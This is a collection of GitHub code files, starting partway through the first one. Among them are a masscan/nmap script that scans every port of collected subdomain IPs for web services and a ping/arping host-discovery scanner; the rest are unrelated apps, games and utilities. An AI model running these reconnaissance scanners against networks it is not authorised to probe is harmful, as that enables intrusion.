domain_queue.put(sub_tuple[1])\n    # resolve the domains with multiple threads\n    
for i in range(20):  # 20 threads\n        a_thread = Domain2IP(domain_queue)\n        a_thread.daemon = True\n        a_thread.start()\n    domain_queue.join()\n\n\ndef shodan_port_check():\n    ...\n\n\nclass MulMasscan(Thread):\n    def __init__(self, domain_q, t_id):\n        super(MulMasscan, self).__init__()\n        self._domain_q = domain_q\n        self._tid = t_id\n\n    def run(self):\n        # start port probing; the file writes take a lock -- could that get very slow?\n        while not self._domain_q.empty():\n            _ip = self._domain_q.get()\n            try:\n                urls_list_to_db = MulMasscan.masscan_port_check(_ip, self._tid)\n                # insert into the database\n                lock.acquire()\n                SQL_helper.url_table_insert(urls_list_to_db, url_tag)\n                lock.release()\n            except:\n                console.print('[error] masscan port scan failed!', style='bold red')\n            finally:\n                self._domain_q.task_done()\n\n    @staticmethod\n    def service_check(ip, port):\n        console.print(\"[info] \" + \"nmap scanning: \" + ip + ':' + port, style='bold blue')\n        nm = nmap.PortScanner()\n        ret = nm.scan(ip, port, arguments='-Pn,-sS')\n        service_name = ret['scan'][ip]['tcp'][int(port)]['name']\n        if 'http' in service_name or service_name == 'sun-answerbook':\n            if service_name == 'https' or service_name == 'https-alt':\n                url = 'https://' + ip + ':' + port\n            else:\n                url = 'http://' + ip + ':' + port\n            return url\n\n    @staticmethod\n    def masscan_port_check(ip, tid):\n        tmp_list = []\n        url_list = []\n        results_list = []\n        console.print('[info] masscan port probing in progress...', style=\"bold blue\")\n        cmd = 'masscan ' + ip + ' -p 1-65535 -oJ ./tmp/masscanRes/' + tid + '_res --rate 10000'  # each thread works on its own file; the server was lagging\n\n        rsp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n        while True:\n            if rsp.poll() is None:  # poll() returning None means the scan is still running\n                pass\n            else:\n                break\n\n        with open('./tmp/masscanRes/'+tid+'_res', 'r', encoding='utf-8') as wr:\n            str0 = wr.read()\n            # print('str0',str0)\n            if len(str0) == 0:\n                return url_list\n            str1 = str0[:-4] + str0[-3:]  # the slicing result differs between Windows and Linux\n            # print('str1', str1)\n            try:\n                json_data = json.loads(str1)\n            except:\n                console.print('[error] something wrong for json loads!', style='bold red')\n                return url_list\n            for line in json_data:\n                ip = line['ip']\n                port = line['ports'][0]['port']\n                result_dict = {\n                    'ip': ip,\n                    'port': port\n                }\n                tmp_list.append(result_dict)\n            if len(tmp_list) > 65535:  # too many ports, just skip them\n                tmp_list.clear()\n            else:\n                results_list.extend(tmp_list)\n\n        for result in results_list:\n            ip = result['ip']\n            port = str(result['port'])\n            url = MulMasscan.service_check(ip, port)  # may return nothing\n            if url:\n                url_list.append(url)\n                console.print('[info] get a url: ' + url, style='bold blue')\n        # todo: add a liveness check\n        return url_list\n\n\ndef port_check():\n    ip_list_ = []\n    ip_queue = Queue()\n\n    subdomain_all_info = SQL_helper.read_subdomain_sql()  # rows of the subdomain table\n    for sub_tuple in subdomain_all_info:\n        ip = sub_tuple[2]\n        ip_list_.append(ip)\n\n    ip_list_ = list(set(ip_list_))\n    for ip in ip_list_:\n        if ip == \"#\":\n            continue\n        # add to the queue\n        ip_queue.put(ip)\n\n    # start the threads\n    for i in range(20):\n        t = MulMasscan(ip_queue, str(i))\n        t.daemon = True\n        t.start()\n    ip_queue.join()\n\n\n# port_check()\n","repo_name":"TimerZz007/misc_scripts","sub_path":"core/auto_collect/port_scan.py","file_name":"port_scan.py","file_ext":"py","file_size_in_byte":5907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71888669672","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport gi\nimport os\nimport re\nimport time\nimport subprocess\n\ngi.require_version(\"Gtk\", \"3.0\")\n\nfrom gi.repository import Gtk, Gio, GLib, GObject\n\nclass 
MainWindow(Gtk.Window):\n\t\"\"\"The main window\"\"\"\n\n\tinstances = 0\n\n\tdef __init__(self, title):\n\t\tsuper(MainWindow, self).__init__(title=title)\n\t\t# make sure there is only one instance of this class\n\t\tif self.instances > 0:\n\t\t\traise RuntimeError(\"You can not create two instances of MainWindow\")\n\t\telse:\n\t\t\tself.instances += 1\n\t\t# some general attributes\n\t\tself.title = title\n\t\t# pre-configuration\n\t\tself.set_border_width(10)\n\t\tself.set_default_size(400, 150)\n\t\t# gtk stuff\n\t\tself.header_bar = Gtk.HeaderBar()\n\t\tself.vbox_main = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.vbox_target = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.hbox_target_label = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.hbox_target_filename = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.vbox_preferences = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.hbox_preferences_label = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.hbox_preferences_check = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\tself.hbox_preferences_frames = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=6)\n\t\t# more\n\t\tself.button_record = Gtk.Button.new_with_label(\"Record\")\n\t\tself.button_stop = Gtk.Button()\n\t\tself.button_play = Gtk.Button()\n\t\tself.label_target = Gtk.Label(\"Target:\")\n\t\tself.entry_target = Gtk.Entry()\n\t\tself.button_explore = Gtk.Button.new_with_mnemonic(\"_Browse\")\n\t\tself.label_preferences = Gtk.Label(\"Preferences:\")\n\t\tself.check_mouse = Gtk.CheckButton(\"Record the mouse\")\n\t\tself.check_audio = Gtk.CheckButton(\"Record audio\")\n\t\tself.button_audio_settings = Gtk.Button.new_with_mnemonic(\"_Configure Audio\")\n\t\tself.label_frames = Gtk.Label(\"Frames per second:\")\n\t\tself.spinbutton_frames = Gtk.SpinButton()\n\n\t\t# gtk configuration\n\t\tself.header_bar.props.title = self.props.title\n\t\tself.header_bar.set_show_close_button(True)\n\t\tself.spinbutton_frames.set_adjustment(Gtk.Adjustment(30, 0, 100, 1, 10, 0))\n\n\t\tself.button_play.add(Gtk.Image.new_from_icon_name(\"gtk-media-play\", Gtk.IconSize.BUTTON))\n\t\tself.button_stop.add(Gtk.Image.new_from_icon_name(\"gtk-media-stop\", Gtk.IconSize.BUTTON))\n\t\tself.header_bar.add(self.button_record)\n\t\tself.header_bar.add(self.button_play)\n\t\tself.header_bar.add(self.button_stop)\n\t\tself.set_titlebar(self.header_bar)\n\t\t# add the elements to the boxes\n\t\tself.vbox_target.add(self.hbox_target_label)\n\t\tself.vbox_target.add(self.hbox_target_filename)\n\t\tself.vbox_preferences.add(self.hbox_preferences_label)\n\t\tself.vbox_preferences.add(self.hbox_preferences_check)\n\t\tself.vbox_preferences.add(self.hbox_preferences_frames)\n\t\tself.vbox_main.add(self.vbox_target)\n\t\tself.vbox_main.add(self.vbox_preferences)\n\t\tself.add(self.vbox_main)\n\t\t# add the other things\n\t\tself.hbox_target_label.add(self.label_target)\n\t\tself.hbox_target_filename.pack_start(self.entry_target, True, True, 
0)\n\t\tself.hbox_target_filename.add(self.button_explore)\n\t\tself.hbox_preferences_label.add(self.label_preferences)\n\t\tself.hbox_preferences_check.add(self.check_mouse)\n\t\tself.hbox_preferences_check.add(self.check_audio)\n\t\tself.hbox_preferences_check.add(self.button_audio_settings)\n\t\tself.hbox_preferences_frames.add(self.label_frames)\n\t\tself.hbox_preferences_frames.add(self.spinbutton_frames)\n\t\t# connect the signals\n\t\tself.button_record.connect(\"clicked\", self.on_button_record_clicked)\n\t\tself.button_stop.connect(\"clicked\", self.on_button_stop_clicked)\n\t\tself.button_play.connect(\"clicked\", self.on_button_play_clicked)\n\t\tself.button_explore.connect(\"clicked\", self.on_button_explore_clicked)\n\t\tself.button_audio_settings.connect(\"clicked\", self.on_button_audio_settings_clicked)\n\t\tself.check_mouse.connect(\"toggled\", self.on_check_mouse_toggled)\n\t\tself.check_audio.connect(\"toggled\", self.on_check_audio_toggled)\n\t\tself.entry_target.connect(\"changed\", self.on_entry_target_changed)\n\n\tdef on_button_record_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_stop_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_play_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_explore_clicked(self, widget):\n\t\tpass\n\n\tdef on_button_audio_settings_clicked(self, widget):\n\t\tpass\n\n\tdef on_check_mouse_toggled(self, widget):\n\t\tpass\n\n\tdef on_check_audio_toggled(self, widget):\n\t\tpass\n\n\tdef on_entry_target_changed(self, widget):\n\t\tpass\n\nclass ExplorerWindow(Gtk.FileChooserDialog):\n\t\"\"\"The file explorer window\"\"\"\n\tdef __init__(self, parent=None):\n\t\tsuper(ExplorerWindow, self).__init__(\n\t\t\tparent=parent,\n\t\t\ttitle=\"Save to:\",\n\t\t\taction=Gtk.FileChooserAction.SAVE)\n\t\tself.logger = parent.logger\n\t\tself.path = None\n\t\tself.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)\n\t\tself.add_button(Gtk.STOCK_SAVE_AS, Gtk.ResponseType.OK)\n\t\tself.filter_text = Gtk.FileFilter()\n\t\tself.filter_text.set_name(\"Video file\")\n\t\tself.filter_text.add_mime_type(\"video/mp4\")\n\t\tself.filter_text.add_mime_type(\"video/mkv\")\n\t\tself.filter_text.add_mime_type(\"video/webm\")\n\t\tself.add_filter(self.filter_text)\n\n\tdef explore(self):\n\t\tself.logger.info(\"Browse requested\")\n\t\tresponse = self.run()\n\t\tif response == Gtk.ResponseType.OK:\n\t\t\tfilename = self.get_filename()\n\t\t\t# if it already exists, ask the user\n\t\t\tif os.path.exists(filename):\n\t\t\t\tmessage_dialog = Gtk.MessageDialog(\n\t\t\t\t\tparent=self,\n\t\t\t\t\ttext=\"The file %s already exists. Do you want to overwrite it?\" % os.path.basename(filename),\n\t\t\t\t\tuse_markup=False,\n\t\t\t\t\ttype=Gtk.MessageType.WARNING,\n\t\t\t\t\tbuttons=Gtk.ButtonsType.YES_NO,\n\t\t\t\t\tmodal=True)\n\t\t\t\tmessage_dialog.format_secondary_text(\n\t\t\t\t\t\"If you overwrite it, the whole content of the file will be erased \" +\n\t\t\t\t\t\"and replaced with the new content.\")\n\t\t\t\tresponse2 = message_dialog.run()\n\t\t\t\tmessage_dialog.destroy()\n\t\t\t\t# then check what the user wants\n\t\t\t\tif response2 == Gtk.ResponseType.NO:\n\t\t\t\t\tmessage_dialog.destroy()\n\t\t\t\t\treturn self.explore()\n\t\t\t\telse:\n\t\t\t\t\tself.path = filename\n\t\t\t\t\tmessage_dialog.destroy()\n\t\t\t\t\tself.destroy()\n\t\t\t\t\treturn self.path\n\t\t\telse:\n\t\t\t\tself.path = filename\n\t\t\t\tself.destroy()\n\t\t\t\treturn self.path\n\t\telif response == Gtk.ResponseType.CANCEL:\n\t\t\tself.destroy()\n\t\t\treturn 
self.path\n\nclass AudioSettinsWindow(Gtk.Dialog):\n\t\"\"\"The window that asks for more information to configure the audio recording.\"\"\"\n\tdef __init__(self, parent=None):\n\t\tsuper(AudioSettinsWindow, self).__init__(\n\t\t\ttitle=\"Audio settings\",\n\t\t\tparent=parent,\n\t\t\tflags=Gtk.DialogFlags.DESTROY_WITH_PARENT)\n\t\tself.logger = parent.logger\n\t\tself._audio_devices = set()\n\t\tself.add_button(Gtk.STOCK_OK, Gtk.ResponseType.OK)\n\t\tself.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)\n\t\t# configure a couple of things\n\t\tself.set_border_width(10)\n\t\tself.set_default_size(350, 300)\n\t\t# customize this dialog\n\t\tself.vbox_main = self.get_content_area()\n\t\tself.vbox_devices = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n\t\tself.frame = Gtk.Frame()\n\t\t# add the pieces\n\t\tself.vbox_main.add(Gtk.Label(\"Select the audio device(s).\"))\n\t\tself.vbox_main.add(self.frame)\n\t\t# look up the audio devices\n\t\tfor description, name in self._get_audio_devices().items():\n\t\t\ttext = description + \"\\n\"\n\t\t\ttext += \"(\" + name + \")\"\n\t\t\tself.logger.debug(\"Got: \" + text)\n\t\t\tcheck_audio_device = Gtk.CheckButton(text)\n\t\t\tcheck_audio_device.connect(\"toggled\", self.on_check_audio_devices_toggled, name)\n\t\t\tself.vbox_devices.add(check_audio_device)\n\t\t# wrap up\n\t\tself.frame.add(self.vbox_devices)\n\t\tself.frame.set_label(\"the devices:\")\n\t\tself.show_all()\n\n\tdef _get_audio_devices(self):\n\t\toutput = subprocess.check_output([\"pacmd\", \"list-sources\"])\n\t\tname_devices = re.findall(\"name: <(.*)>\", output.decode())\n\t\tdescription_devices = re.findall(\"device.description = \\\"(.*)\\\"\", output.decode())\n\t\treturn {description: name for description, name in zip(description_devices, name_devices)}\n\n\tdef on_check_audio_devices_toggled(self, widget, name):\n\t\tif widget.get_active():\n\t\t\tself._audio_devices.add(name)\n\t\telse:\n\t\t\tself._audio_devices.remove(name)\n\n\t@property\n\tdef audio_devices(self):\n\t\treturn list(self._audio_devices)\n\nclass ProgressWindow(Gtk.Dialog):\n\t\"\"\"The window that shows how the file processing is going\"\"\"\n\tdef __init__(self, parent):\n\t\tsuper(ProgressWindow, self).__init__(\n\t\t\tparent=parent,\n\t\t\ttitle=\"Processing files...\",\n\t\t\tflags=Gtk.DialogFlags.DESTROY_WITH_PARENT)\n\t\tself.logger = parent.logger\n\t\tself.process = None\n\t\tself.std = None\n\t\tself.cancelled = False\n\t\tself.re_duration = re.compile(r\"Duration: (\\d\\d):(\\d\\d):(\\d\\d(\\.\\d\\d))\")\n\t\tself.re_time = re.compile(r\"time=(\\d\\d):(\\d\\d):(\\d\\d\\.\\d\\d)\")\n\t\t# add a button\n\t\tself.add_button(Gtk.STOCK_STOP, Gtk.ResponseType.CANCEL)\n\t\t# configure a couple of things\n\t\tself.set_border_width(10)\n\t\tself.set_default_size(350, 100)\n\t\t# customize this dialog\n\t\tself.vbox_main = self.get_content_area()\n\t\tself.progress = Gtk.ProgressBar()\n\t\tself.label_info = Gtk.Label()\n\t\t# add the pieces\n\t\tself.vbox_main.add(self.label_info)\n\t\tself.vbox_main.add(self.progress)\n\t\tself.show_all()\n\n\tdef check(self, process, std, info):\n\t\tself.logger.debug(\"New job for: \" + info)\n\t\tself.process = process\n\t\tself.std = std\n\t\tduration = -1\n\t\tself.label_info.set_text(info)\n\t\tself.progress.set_fraction(0.0)\n\t\tbuffer = str()\n\t\twhile self.process.poll() is None:\n\t\t\tcontent = 
self.std.read()\n\t\t\tcontent = content.decode()\n\t\t\tcontent = content.replace(\"\\r\", \"\\n\")\n\t\t\tif content:\n\t\t\t\tbuffer += content\n\t\t\t\tif duration < 0:\n\t\t\t\t\tmatched = self.re_duration.search(buffer)\n\t\t\t\t\tif matched:\n\t\t\t\t\t\tnumbers = list(matched.groups())[:3]\n\t\t\t\t\t\tnumbers.reverse()\n\t\t\t\t\t\tduration = sum([float(number)*(60**i) for i,number in enumerate(numbers)])\n\t\t\t\t\t\tself.logger.debug(\"The duration: \" + str(duration))\n\n\t\t\t\t\t\t# check the other pattern as well\n\t\t\t\t\t\tmatched = self.re_time.search(buffer)\n\t\t\t\t\t\tif matched:\n\t\t\t\t\t\t\tGLib.idle_add(self.update_progress, 1.0)\n\t\t\t\t\t\t\tself.logger.debug(\"It was already finished\")\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tcontinue\n\t\t\t\t#self.logger.debug(\"The duration: \" + str(duration))\n\t\t\t\tif duration > 0:\n\t\t\t\t\tmatched = self.re_time.findall(buffer)\n\t\t\t\t\tmatched.reverse()\n\t\t\t\t\tmatched = matched[:-1]\n\t\t\t\t\tif matched:\n\t\t\t\t\t\tnumbers = list(matched[0])[:3]\n\t\t\t\t\t\tnumbers.reverse()\n\t\t\t\t\t\ttime = sum([float(number)*(60**i) for i,number in enumerate(numbers)])\n\t\t\t\t\t\tfraction = time / duration\n\t\t\t\t\t\tself.logger.debug(\"Time value: \" + str(time) + \" > \" + str(numbers) + \" = \" + str(fraction))\n\t\t\t\t\t\tGLib.idle_add(self.update_progress, fraction)\n\t\t\t\tbuffer = buffer[-50:]  # keep only the tail, so a partial match can complete on the next read\n\t\treturn self.process.poll()\n\n\tdef cancel(self):\n\t\t# cancel the current process\n\t\tself.logger.info(\"Cancelling the progress\")\n\t\tself.process.terminate()\n\t\tself.cancelled = True\n\n\tdef update_progress(self, fraction):\n\t\tself.progress.set_fraction(fraction)","repo_name":"David256/BlueLobsterRecorder","sub_path":"classes/gui/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"441710668","text":"import pygame\r\nfrom Table import Table\r\nimport settings\r\n\r\n\r\nclass Game:\r\n    window = pygame.display.set_mode(settings.WINDOW_SIZE)\r\n    clock = pygame.time.Clock()\r\n    pygame.display.set_caption(\"Game 2048\")\r\n    pygame.init()\r\n\r\n    def __init__(self):\r\n        self.table = Table((4, 4), 125)\r\n        self.game_running = 1\r\n        self.FPS = 1\r\n\r\n    def run(self):\r\n        self.table.update()\r\n        self.table.update()\r\n        while self.game_running:\r\n            self.clock.tick(self.FPS)\r\n            for event in pygame.event.get():\r\n                if event.type == pygame.QUIT:\r\n                    self.game_running = 0\r\n                    return\r\n                if event.type == pygame.KEYDOWN:\r\n                    if event.key == pygame.K_LEFT:\r\n                        self.table.update(3)\r\n                    elif event.key == pygame.K_RIGHT:\r\n                        self.table.update(1)\r\n                    elif event.key == pygame.K_DOWN:\r\n                        self.table.update(2)\r\n                    elif event.key == pygame.K_UP:\r\n                        self.table.update(0)\r\n            self.draw()\r\n\r\n    def draw(self):\r\n        self.table.draw(self.window)\r\n        pygame.display.flip()\r\n\r\n    def update(self):\r\n        pass\r\n","repo_name":"MDastan2005/Python-programms","sub_path":"2048/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18561399936","text":"#!/usr/bin/python3\n\nplot = '■'\n\nimport sys\n\ndata = ((len(sys.argv) > 1) and open(sys.argv[1]) or sys.stdin).readlines()\ndata = [item.strip().split('\\t') for item in data]\ndata = [(str(label), int(value)) for (label, value) in data ]\n\nlabels, values = zip(*data)\nmax_label_width = max(map(lambda x: len(str(x)), labels))\ndel 
labels\n\nmax_value_width = max(map(lambda x: len(str(x)), values))\nmax_value = max(values)\ndel values\n\nfrom shutil import get_terminal_size\nterminal_width, terminal_height = get_terminal_size((80,25))\nmax_width = terminal_width - max_label_width - max_value_width - 2\n\nfor label, value in data:\n\tprint(label.rjust(max_label_width), plot * int(max_width * value / max_value), value)\n","repo_name":"patatetom/ttybarchart","sub_path":"ttybarchart.py","file_name":"ttybarchart.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24259043296","text":"# -*- coding: utf8 -*-\nimport time\n\nimport pandas as pd\nfrom model.data.GoogleDriveAPIAuth import GoogleAPIAuth\nfrom model.data.VariableSet import VariableSet\nvs = VariableSet()\n\n# Select the regions to compare (Seoul through Jeju)\ntarget = [vs.region_Gyeonggi, vs.region_Seoul]\n\n## Using the spreadsheet\n# fetch the spreadsheet document\ngd = GoogleAPIAuth()\ndoc = gd.gc.open_by_url(vs.spreadsheet_url)\nws = doc.worksheet('응답결과')  # worksheet name (Korean for \"survey responses\"), kept as-is to match the sheet\n\n# write results starting from the cell after the existing entries\nvalues = ws.get_all_values()\nheader, rows = values[0], values[1:]\nexcel_source = pd.DataFrame(rows, columns=header)\nprint('Number of existing input cells: ' + str(len(excel_source)))\n# set the starting cell\nstart = len(excel_source)\n\nresults = []\n# print(target)\n\nfor region in target:\n    for city in region:\n        for area, result in region.items():\n            print(\"Region: \" + area)\n            print(\"Search results within the region: \" + str(len(result)))\n            i = 0\n            for data in range(len(result)):\n                # write the region and its code to the spreadsheet\n                for category, output in result[i].items():\n                    if category == 'value':\n                        lcode = output\n                    if category == 'description':\n                        location = output\n                i += 1\n                # save each search result into the list\n                results.append((lcode, location))\n            break\n    # save the whole list in one call\n    ws.update('A' + str(start + 2), results)\n","repo_name":"alvinshin81/alvinshin","sub_path":"usefulScripts/compareLocationData.py","file_name":"compareLocationData.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43124188056","text":"from aws_cdk.core import (\n    Construct,\n    Stack,\n    Tags,\n)\nfrom aws_cdk.aws_cloudfront import (\n    EdgeLambda,\n    LambdaEdgeEventType,\n    LambdaFunctionAssociation,\n)\nfrom aws_cdk.aws_lambda import (\n    Code,\n    Runtime,\n)\nfrom aws_cdk.aws_s3 import (\n    BlockPublicAccess,\n    Bucket,\n    BucketEncryption,\n)\n\nfrom openttd.construct.s3_cloud_front import S3CloudFront\nfrom openttd.construct.s3_cloud_front_v2 import S3CloudFrontV2\nfrom openttd.enumeration import Deployment\nfrom openttd.stack.common import lambda_edge\n\n\nclass RedirectStack(Stack):\n    application_name = \"Redirect\"\n    subdomain_names = [\n        \"download\",\n        \"farm\",\n        \"forum\",\n        \"github\",\n        \"grfsearch\",\n        \"nightly\",\n        \"noai\",\n        \"nogo\",\n        \"proxy.binaries\",\n        \"root\",\n        \"security\",\n    ]\n\n    def __init__(self, scope: Construct, id: str, *, deployment: Deployment, **kwargs) -> None:\n        super().__init__(scope, id, **kwargs)\n\n        Tags.of(self).add(\"Application\", self.application_name)\n        Tags.of(self).add(\"Deployment\", deployment.value)\n\n        bucket_site = Bucket(\n            self,\n            \"Site\",\n            block_public_access=BlockPublicAccess.BLOCK_ALL,\n        )\n\n        bucket_access_logs = Bucket(\n            self,\n            \"AccessLogs\",\n            encryption=BucketEncryption.S3_MANAGED,\n            block_public_access=BlockPublicAccess.BLOCK_ALL,\n        )\n\n        for subdomain_name in self.subdomain_names:\n            func_version = lambda_edge.create_function(\n                self,\n                
f\"Redirect-{subdomain_name}-{deployment.value}\",\n runtime=Runtime.NODEJS_10_X,\n handler=\"index.handler\",\n code=Code.from_asset(f\"./lambdas/redirect-{subdomain_name}\"),\n )\n\n if subdomain_name == \"grfsearch\":\n S3CloudFrontV2(\n self,\n f\"S3CloudFront-{subdomain_name}\",\n subdomain_name=subdomain_name,\n bucket_site=bucket_site,\n bucket_access_logs=bucket_access_logs,\n edge_lambdas=[\n EdgeLambda(\n event_type=LambdaEdgeEventType.ORIGIN_REQUEST,\n function_version=func_version,\n ),\n ],\n forward_query_string_cache_keys=[\"do\", \"q\"],\n )\n else:\n S3CloudFront(\n self,\n f\"S3CloudFront-{subdomain_name}\",\n subdomain_name=subdomain_name,\n bucket_site=bucket_site,\n bucket_access_logs=bucket_access_logs,\n lambda_function_associations=[\n LambdaFunctionAssociation(\n event_type=LambdaEdgeEventType.ORIGIN_REQUEST,\n lambda_function=func_version,\n ),\n ],\n )\n","repo_name":"OpenTTD/aws-infra","sub_path":"openttd/stack/application/redirect.py","file_name":"redirect.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15424007386","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport os\n\n#website url\n#url = 'https://www.pexels.com/search/model'\nurl = 'https://www.imgmodels.com/new-york/women'\n\npage = requests.get(url)\nsoup = bs(page.text, 'html.parser')\n\nimage_tags = soup.findAll('img')\n#print(image_tags)\n\nif not os.path.exists('models'):\n os.makedirs('models')\n\n#move to new directory\nos.chdir('models')\n\nx = 0\nprint(f\"X is {x}\")\nfor image in image_tags:\n #print(\"image src\")\n print (image.get('data-original'))\n #print (image['alt'])\n \n try:\n url = image.get('data-original')\n source = requests.get(url)\n if source.status_code == 200:\n with open('model-'+str(x)+'.jpg','wb') as f:\n f.write(requests.get(url).content)\n f.close()\n x += 1\n print(f\"x is {x}\")\n except OSError as err:\n print(f\"Something not working {err}\")\n ","repo_name":"klarify-tech/twitter-bot","sub_path":"get-models.py","file_name":"get-models.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71124647274","text":"#!/usr/bin/python\n#coding=utf-8\n# Application that detects alive hosts using ICMP and ARP\n# by FM\n# Python 3\n# -------------------------------------\nimport os, platform, sys, time, re, ipaddress\nfrom datetime import datetime as dt\nfrom subprocess import Popen, PIPE\n\n\n## Scan an ip address in order to check for host liveness\ndef ip_scan(ip, ping_cmd, arping_cmd):\n\n #print(\"Testing ip \" + ip)\n comm1 = ping_cmd + ip\n resp1 = os.popen(comm1)\n\n status = \"DOWN\"\n for line in resp1.readlines():\n if(line.upper().count(\"TTL\")):\n status = \"UP\"\n #print(ip, \"--> Live\")\n break\n\n if(status == \"DOWN\"):\n comm2 = arping_cmd + ip\n resp2 = os.popen(comm2)\n\n for line in resp2.readlines():\n if(line.upper().count(\"RTT\")):\n status = \"UP, NO ICMP\"\n #print(ip, \"--> Live, NO ICMP\")\n break\n\n ## Get target MAC address\n Popen([\"ping\", \"-c 1\", ip], stdout = PIPE)\n pid = Popen([\"arp\", \"-n\", ip], stdout = PIPE)\n s = pid.communicate()[0]\n hasMac = re.search(r\"(([a-f\\d]{1,2}\\:){5}[a-f\\d]{1,2})\", s.decode())\n if hasMac is not None:\n mac = hasMac.groups()[0]\n else:\n mac = 'None'\n\n hostname = 'None'\n ## Get hostname\n ## TODO\n\n ## Set data\n data = (ip,mac,hostname,status)\n if status == \"UP\":\n 
print(data)\n\n## MAIN -------------------------------------\nif __name__ == \"__main__\":\n    if len(sys.argv) == 2:\n\n        try:\n\n            ## Validates if the OS is Windows or other\n            ## and sets the appropriate commands\n            oper = platform.system()\n            timeout = 4\n            if(oper == \"Windows\"):\n                ping_cmd = f\"ping -n 1 -w {timeout} \"\n                arping_cmd = f\"arp-ping -n 1 \"\n            else:\n                ## Ask for the interface for arping\n                interface = input(\"Enter the interface: \")\n                ping_cmd = f\"ping -c 1 -t {timeout} \"\n                arping_cmd = f\"arping -c 1 -i {interface} \"  # trailing space: the target IP is appended directly\n            \n            ## Set the beginning datetime\n            t1 = dt.now()\n\n            subnets = open(sys.argv[1],\"r\")\n            for subnet in subnets:\n                subnet = subnet.replace(\"\\n\",\"\").replace(\"\\t\",\"\")\n                ## Run the scanner\n                print(\"Scanning Subnet: \", subnet)\n\n                ## Scans the machines in the defined range\n                print(\"Scanning in Progress\")\n\n                hosts = [str(ip) for ip in ipaddress.IPv4Network(subnet)]\n                for ip in hosts:\n                    ip_scan(ip, ping_cmd, arping_cmd)\n\n            ## Set the ending datetime\n            t2 = dt.now()\n            \n            ## Calculates the scan time and prints it\n            total = t2 - t1\n\n            print(\"Scanning completed in: \",total)\n\n        except KeyboardInterrupt:\n            print(\"Execution interrupted: Ctrl+C\")\n            sys.exit()\n\n    else:\n        print('[-] Usage: ' + sys.argv[0] + ' subnet_list.txt')\n","repo_name":"Azkrath/EthicalHacking","sub_path":"Scanners/detect_hosts_v1.py","file_name":"detect_hosts_v1.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"32554467984","text":"from sqlalchemy import create_engine, text\nimport os\n\ndb_connection_string = os.environ['DB_CONNECTION_STRING']\n\nengine = create_engine(db_connection_string,\n                       connect_args={\"ssl\": {\n                           \"ssl_ca\": \"/etc/ssl/cert.pem\"\n                       }})\n\n\ndef load_product_from_db(product):\n    with engine.connect() as conn:\n        # bind the value instead of interpolating it into the SQL (avoids injection and shadowing the built-in str)\n        query = text('select * from products where product = :product')\n        result = conn.execute(query, {\"product\": product})\n        row = result.all()\n        if len(row) == 0:\n            return None\n        else:\n            pro = row[0]._mapping\n            return dict(pro)\n\n\ndef load_price_from_db():\n    with engine.connect() as conn:\n        result = conn.execute(text('select * from products'))\n        PRICES = []\n        for row in result.all():\n            PRICES.append(row._mapping)\n        return PRICES\n","repo_name":"HardikChhabra/Website_for_Enactus","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"72769477674","text":"import logging\nfrom os import getenv\n\nfrom telethon import TelegramClient\n\nfrom handlers import handle_albums, handle_any_message\n\n\nlog = logging.getLogger(__name__)\n\n\ndef init_bot(targets: list[str]) -> TelegramClient:\n    log.info('Initializing client…')\n    client = TelegramClient(\n        session=getenv('SESSION_NAME') or 'meowgram_parser',\n        api_id=getenv('API_ID'),\n        api_hash=getenv('API_HASH'),\n    )\n    log.info('Done')\n    log.info('Setting up handlers…')\n    handle_albums(client, targets)\n    handle_any_message(client, targets)\n    log.info('Done')\n    return client\n\n\ndef start_bot(client: TelegramClient):\n    log.info('Starting client…')\n    client.start()\n    log.info('Done')\n    client.run_until_disconnected()\n","repo_name":"ExposedCat/tg-channels-parser","sub_path":"src/bot_config.py","file_name":"bot_config.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
